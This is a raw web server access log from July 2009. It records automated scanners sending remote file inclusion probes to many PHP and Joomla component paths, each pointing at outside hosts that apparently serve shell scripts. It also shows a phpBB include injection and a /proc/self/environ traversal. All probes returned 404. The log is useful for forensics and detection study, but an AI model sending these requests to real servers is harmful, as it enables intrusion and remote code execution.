91.202.4.158 - - [13/Jul/2009:00:27:00 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 228 "-" "XXXXXX"
91.202.4.158 - - [13/Jul/2009:00:27:00 -0400] "GET /logs/error_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 254 "-" "XXXXXX"
91.202.4.158 - - [13/Jul/2009:00:27:00 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
91.202.4.158 - - [13/Jul/2009:00:27:00 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 255 "-" "XXXXXX"
91.202.4.158 - - [13/Jul/2009:00:27:00 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 228 "-" "XXXXXX"
91.202.4.158 - - [13/Jul/2009:00:27:00 -0400] "GET /logs/error_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 254 "-" "XXXXXX"
91.202.4.158 - - [13/Jul/2009:00:27:00 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 255 "-" "XXXXXX"
91.202.4.158 - - [13/Jul/2009:00:27:00 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
59.22.140.17 - - [13/Jul/2009:00:27:01 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
201.199.194.8 - - [13/Jul/2009:00:27:10 -0400] "GET /logs/access_log.Q109052100/administrator/show.php?path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.59.21.101 - - [13/Jul/2009:00:27:36 -0400] "GET /logs/access_log.Q109051400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
69.59.21.101 - - [13/Jul/2009:00:27:36 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
69.59.21.101 - - [13/Jul/2009:00:27:36 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
69.59.21.101 - - [13/Jul/2009:00:27:39 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
69.163.139.56 - - [13/Jul/2009:00:28:07 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.163.139.56 - - [13/Jul/2009:00:28:07 -0400] "GET /logs/access_log.Q109051400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.163.139.56 - - [13/Jul/2009:00:28:07 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.230.9.68 - - [13/Jul/2009:00:28:11 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
87.230.9.68 - - [13/Jul/2009:00:28:11 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
87.230.9.68 - - [13/Jul/2009:00:28:11 -0400] "GET /logs/access_log.Q109051400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.163.139.56 - - [13/Jul/2009:00:28:13 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.230.9.68 - - [13/Jul/2009:00:28:16 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
116.127.121.39 - - [13/Jul/2009:00:28:55 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:28:55 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:28:55 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:29:06 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:29:06 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:29:06 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:29:43 -0400] "GET /logs/access_log.Q109061300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:29:56 -0400] "GET /logs/access_log.Q109061300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:29:59 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:29:59 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:29:59 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:30:51 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:30:51 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:30:51 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:30:56 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:30:56 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:30:56 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:31:00 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:31:01 -0400] "GET /logs/access_log.Q109061300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:31:02 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:31:02 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:31:02 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:00:31:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.87.64.234 - - [13/Jul/2009:00:31:05 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:31:09 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:31:35 -0400] "GET /logs/access_log.Q109060500%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:31:46 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:31:46 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:32:06 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:32:06 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:32:06 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:32:10 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:32:11 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:32:26 -0400] "GET /wp-content/plugins/dm-albums/dm-albums.php?currdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:32:26 -0400] "GET /logs/access_log.Q109070200/wp-content/plugins/dm-albums/dm-albums.php?currdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:32:26 -0400] "GET /logs/wp-content/plugins/dm-albums/dm-albums.php?currdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:32:29 -0400] "GET /logs/wp-content/plugins/dm-albums/dm-albums.php?currdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:32:29 -0400] "GET /wp-content/plugins/dm-albums/dm-albums.php?currdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:32:29 -0400] "GET /logs/access_log.Q109070200/wp-content/plugins/dm-albums/dm-albums.php?currdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.15.48.60 - - [13/Jul/2009:00:32:58 -0400] "GET /logs/access_log.Q109050300//update/update2.php?lang=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
67.15.48.60 - - [13/Jul/2009:00:32:58 -0400] "GET /logs//update/update2.php?lang=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.810"
67.15.48.60 - - [13/Jul/2009:00:32:59 -0400] "GET //update/update2.php?lang=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.810"
221.143.40.35 - - [13/Jul/2009:00:33:33 -0400] "GET //components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
221.143.40.35 - - [13/Jul/2009:00:33:33 -0400] "GET /logs/access_log.Q109060900//components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
221.143.40.35 - - [13/Jul/2009:00:33:33 -0400] "GET /logs/access_log.Q109062700//components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
221.143.40.35 - - [13/Jul/2009:00:33:33 -0400] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
86.35.0.115 - - [13/Jul/2009:00:33:53 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
86.35.0.115 - - [13/Jul/2009:00:33:53 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
86.35.0.115 - - [13/Jul/2009:00:33:53 -0400] "GET /logs/access_log.Q109061400%20%20/joomla/index.php?option=com_restaurante&task=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
86.35.0.115 - - [13/Jul/2009:00:34:00 -0400] "GET /logs/error_log.Q109061400%20%20/joomla/index.php?option=com_restaurante&task=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:00:35:32 -0400] "GET //components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:00:35:32 -0400] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:00:35:32 -0400] "GET /logs/access_log.Q109060900//components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:00:35:32 -0400] "GET /logs/access_log.Q109062700//components/com_mambowiki/MamboLogin.php?IP=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:35:37 -0400] "GET /logs/index_inc.php?inc_ordner=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:35:37 -0400] "GET /logs/access_log.Q109062900%20%20/index_inc.php?inc_ordner=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:35:37 -0400] "GET /index_inc.php?inc_ordner=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:35:42 -0400] "GET /logs/access_log.Q109060500%20%20/index_inc.php?inc_ordner=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:35:43 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:35:44 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:35:46 -0400] "GET /logs/access_log.Q109062900/index_inc.php?inc_ordner=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.822"
76.12.17.218 - - [13/Jul/2009:00:35:46 -0400] "GET /index_inc.php?inc_ordner=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.822"
76.12.17.218 - - [13/Jul/2009:00:35:46 -0400] "GET /logs/index_inc.php?inc_ordner=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.822"
76.12.17.218 - - [13/Jul/2009:00:35:46 -0400] "GET /logs/access_log.Q109060500/index_inc.php?inc_ordner=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.822"
70.87.64.234 - - [13/Jul/2009:00:36:02 -0400] "GET /logs/access_log.Q109062900%20%20/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:02 -0400] "GET /logs/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:02 -0400] "GET /index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:03 -0400] "GET /index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:00:36:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.87.64.234 - - [13/Jul/2009:00:36:03 -0400] "GET /index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:03 -0400] "GET /logs/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:04 -0400] "GET /logs/access_log.Q109062900%20%20/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:04 -0400] "GET /logs/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:04 -0400] "GET /logs/access_log.Q109062900/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:14 -0400] "GET /logs/access_log.Q109060500/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:18 -0400] "GET /logs/access_log.Q109060500%20%20/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:21 -0400] "GET /logs/access_log.Q109060500%20%20/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.235.41.15 - - [13/Jul/2009:00:36:22 -0400] "GET /logs/error_log.Q109060700/bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/dalnet.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.819"
77.235.41.15 - - [13/Jul/2009:00:36:22 -0400] "GET /bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/dalnet.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.819"
77.235.41.15 - - [13/Jul/2009:00:36:22 -0400] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/dalnet.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.819"
70.87.64.234 - - [13/Jul/2009:00:36:30 -0400] "GET /logs/access_log.Q109062900%20%20/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:00:36:33 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:36:37 -0400] "GET /logs/access_log.Q109060500%20%20/index_inc.php?inc_ordner=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:36:53 -0400] "GET /logs/access_log.Q109062900/index_inc.php?inc_ordner=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:36:58 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:00:37:00 -0400] "GET /logs/access_log.Q109060500/index_inc.php?inc_ordner=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
